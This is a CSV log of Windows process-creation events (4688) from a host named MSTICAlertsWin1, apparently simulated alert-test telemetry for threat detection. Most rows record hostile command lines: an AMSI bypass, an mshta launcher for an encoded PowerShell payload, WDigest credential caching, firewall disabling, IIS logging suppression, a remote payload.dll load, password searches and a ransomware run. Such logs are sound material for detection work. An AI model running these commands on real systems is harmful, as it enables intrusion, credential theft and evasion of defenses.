159,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:15.923,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x166c,C:\Windows\System32\net.exe,%%1936,0xbc8,net  use v: \\tsclient\c,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:15.923
160,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:15.950,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1660,C:\Windows\System32\net.exe,%%1936,0xbc8,net  v: /delete,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:15.950
161,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:15.967,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1658,C:\Windows\System32\net1.exe,%%1936,0x1660,C:\Windows\system32\net1  v: /delete,C:\Windows\System32\net.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:15.967
162,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:16.020,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x169c,C:\Diagnostics\UserTmp\cmd.exe,%%1936,0xbc8,"cmd  /c C:\Windows\System32\mshta.exe vbscript:CreateObject(""Wscript.Shell"").Run("".\powershell.exe -c """"$x=$((gp HKLM:Software\Microsoft\Windows\CurrentVersion Certificate).Certificate);.\powershell -E $y"""""",0,True)(window.close)",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:16.020
163,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:16.067,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x168c,C:\Diagnostics\UserTmp\netsh.exe,%%1936,0xbc8,.\netsh  advfirewall firewall add rule name=RbtGskQ action=allow program=c:\users\Bob\appdata\Roaming\RbtGskQ\RbtGskQ.exe,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:16.067
164,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:16.117,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x16c8,C:\Diagnostics\UserTmp\reg.exe,%%1936,0xbc8,.\reg  add HKLM\KEY_LOCAL_MACHINE\...securityproviders\wdigest uselogoncredential /t 1,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:16.117
165,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:17.217,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1560,C:\Windows\System32\conhost.exe,%%1936,0x1550,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Windows\System32\vssadmin.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:17.217
166,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:17.220,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x158c,C:\Windows\System32\cmd.exe,%%1936,0xbc8,c:\Windows\System32\cmd.exe  /c net user,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:17.220
167,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:17.257,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x15d0,C:\Windows\System32\conhost.exe,%%1936,0x158c,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:17.257
168,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:17.363,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x15c8,C:\Diagnostics\UserTmp\cmd.exe,%%1936,0xbc8,"cmd  /c c:\Diagnostics\UserTmp\scrsave.scr""",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:17.363
169,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:17.410,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x15ec,C:\Diagnostics\UserTmp\svchost.exe,%%1936,0xbc8,c:\Diagnostics\UserTmp\svchost.exe ,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:17.410
170,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:17.457,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x15e8,C:\Diagnostics\UserTmp\smss.exe,%%1936,0xbc8,c:\Diagnostics\UserTmp\smss.exe ,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:17.457
171,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:17.493,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1630,C:\Windows\System32\svchost.exe,%%1936,0xbc8,c:\Windows\System32\svchost.exe  -k malicious,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:17.493
172,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:17.520,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1668,C:\Diagnostics\UserTmp\cmd.exe,%%1936,0xbc8,"cmd.exe  /c echo createobject""msxml2.xmlhttp"") ",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:17.520
173,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:17.570,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1658,C:\Diagnostics\UserTmp\ASC_Alerttest_662jfi039n.exe,%%1936,0xbc8,ASC_Alerttest_662jfi039n.exe  -foo,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:17.570
174,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:17.580,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1664,C:\Diagnostics\UserTmp\powershell.exe,%%1936,0xbc8,".\powershell.exe   -command [ref].assembly.gettype('http://system.management.automation.amsiutils').getfield('amsiinitfailed','nonpublic,static').setvalue($null,$true)\""",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:17.580
175,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:17.650,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x16d4,C:\Diagnostics\UserTmp\netsh.exe,%%1936,0xbc8,netsh  start capture=yes IPv4.Address=1.2.3.4 tracefile=C:\\Users\\user\\AppData\\Local\\Temp\\bzzzzzz.txt,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:17.650
176,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:18.080,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x16c0,C:\Diagnostics\UserTmp\wuauclt.exe,%%1936,0xbc8,".\wuauclt.exe  /C ""c:\windows\softwaredistribution\cscript.exe""",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:18.080
177,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:18.147,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1704,C:\Windows\SoftwareDistribution\cscript.exe,%%1936,0x16c0,c:\windows\softwaredistribution\cscript.exe,C:\Diagnostics\UserTmp\wuauclt.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:18.147
178,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:18.230,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x16fc,C:\Windows\System32\net1.exe,%%1936,0x1704,C:\Windows\system32\net1,C:\Windows\SoftwareDistribution\cscript.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:18.230
179,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:36:24.010,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x11cc,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:36:24.010
180,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:36:24.027,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x99c,C:\Windows\System32\conhost.exe,%%1936,0x11cc,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:36:24.027
181,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:36:25.517,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x11c4,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:36:25.517
182,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:36:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xd14,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:36:26.000
183,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:49:26.010,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xaa8,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:49:26.010
184,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:50:24.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x138c,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:50:24.000
185,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:50:24.017,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xa60,C:\Windows\System32\conhost.exe,%%1936,0x138c,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:50:24.017
186,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:50:25.693,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xab8,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:50:25.693
187,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:50:26.010,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xfbc,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:50:26.010
188,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:33:26.003,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1380,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:33:26.003
189,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:33:32.463,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x5cc,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:33:32.463
190,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:18.287,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x16f4,C:\Diagnostics\UserTmp\lsass.exe,%%1936,0xbc8,".\lsass.exe  /C ""c:\windows\softwaredistribution\cscript.exe""",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:18.287
191,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:18.300,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1770,C:\Windows\SoftwareDistribution\cscript.exe,%%1936,0x16f4,c:\windows\softwaredistribution\cscript.exe,C:\Diagnostics\UserTmp\lsass.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:18.300
192,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:18.320,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1774,C:\Windows\System32\net1.exe,%%1936,0x1770,C:\Windows\system32\net1,C:\Windows\SoftwareDistribution\cscript.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:18.320
193,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:18.337,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1728,C:\Diagnostics\UserTmp\cmd.exe,%%1936,0xbc8,"cmd  /c ""powershell wscript.shell used to download a .gif""",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:18.337
194,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:18.403,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1798,C:\Diagnostics\UserTmp\cacls.exe,%%1936,0xbc8,cacls.exe  c:\windows\system32\wscript.exe /e /t /g everyone:f,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:18.403
195,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:18.450,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1758,C:\Diagnostics\UserTmp\cmd.exe,%%1936,0xbc8,"cmd  /c ""cd /d ""C:\inetpub\wwwroot""&c:\windows\system32\inetsrv\appcmd set config ""Default Web Site/"" /section:httplogging /dontLog:true&echo [S]&cd&echo [E]""",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:18.450
196,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:18.500,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x17a8,C:\Diagnostics\UserTmp\2840.exe,%%1936,0xbc8,c:\Diagnostics\UserTmp\2840.exe ,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:18.500
197,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:18.547,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x17f8,C:\Diagnostics\UserTmp\a_keygen.exe,%%1936,0xbc8,c:\Diagnostics\UserTmp\a_keygen.exe ,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:18.547
198,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:18.553,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x17cc,C:\Diagnostics\UserTmp\cmd.exe,%%1936,0xbc8,"cmd  /c echo "" SYSTEMINFO && SYSTEMINFO && DEL """,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:18.553
199,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:18.630,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1414,C:\Diagnostics\UserTmp\bittorrent.exe,%%1936,0xbc8,c:\Diagnostics\UserTmp\bittorrent.exe ,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:18.630
200,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:18.670,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x28c,C:\Diagnostics\UserTmp\netsh.exe,%%1936,0xbc8,c:\Diagnostics\UserTmp\netsh.exe   firewall set opmode mode=disable profile=all,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:18.670
201,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:18.707,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0xc18,C:\Diagnostics\UserTmp\cmd.exe,%%1936,0xbc8,cmd  /c echo rundll32.exe perfc.dat,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:18.707
202,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:18.770,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1404,C:\Diagnostics\UserTmp\ransomware.exe,%%1936,0xbc8,c:\Diagnostics\UserTmp\ransomware.exe   @ abc.com abc.wallet,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:18.770
203,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:18.820,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x147c,C:\Diagnostics\UserTmp\cmd.exe,%%1936,0xbc8,cmd  /c echo /e:vbscript.encode /b,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:18.820
204,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:18.867,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1464,C:\Diagnostics\UserTmp\pcalua.exe,%%1936,0xbc8,pcalua.exe  -a \\server\payload.dll,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:18.867
205,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:18.917,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x14b8,C:\Diagnostics\UserTmp\findstr.exe,%%1936,0xbc8,findstr  /si password sysvol *.txt,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:18.917
206,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:18.967,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x14ec,C:\Diagnostics\UserTmp\odbcconf.exe,%%1936,0xbc8,odbcconf.exe  /S /A {REGSVR C:\Users\Administrator\AppData\Roaming\{RANDOM}.txt,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:18.967
207,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:19.010,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x14f0,C:\Diagnostics\UserTmp\odbcconf.exe,%%1936,0xbc8,odbcconf.exe  /f my.rspáá,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:19.010
208,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:19.060,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x14e8,C:\Diagnostics\UserTmp\SQLDumper.exe,%%1936,0xbc8,sqldumper.exe  464 0 0x0110:40,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:19.060
209,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:19.127,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1564,C:\Diagnostics\UserTmp\mt.exe,%%1936,0xbc8,mt.exe  port,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:19.127
210,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:19.180,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x155c,C:\Diagnostics\UserTmp\mt.exe,%%1936,0xbc8,mt.exe  smb,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:19.180
211,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:19.223,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x15b8,C:\Diagnostics\UserTmp\hd.exe,%%1936,0xbc8,hd.exe  -pslist,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:19.223
212,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:19.337,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x15d0,C:\Diagnostics\UserTmp\hd.exe,%%1936,0xbc8,hd.exe  -enum,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:19.337
213,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:19.403,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x158c,C:\Diagnostics\UserTmp\netsh.exe,%%1936,0xbc8,netsh.exe  PortOpenning,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:19.403
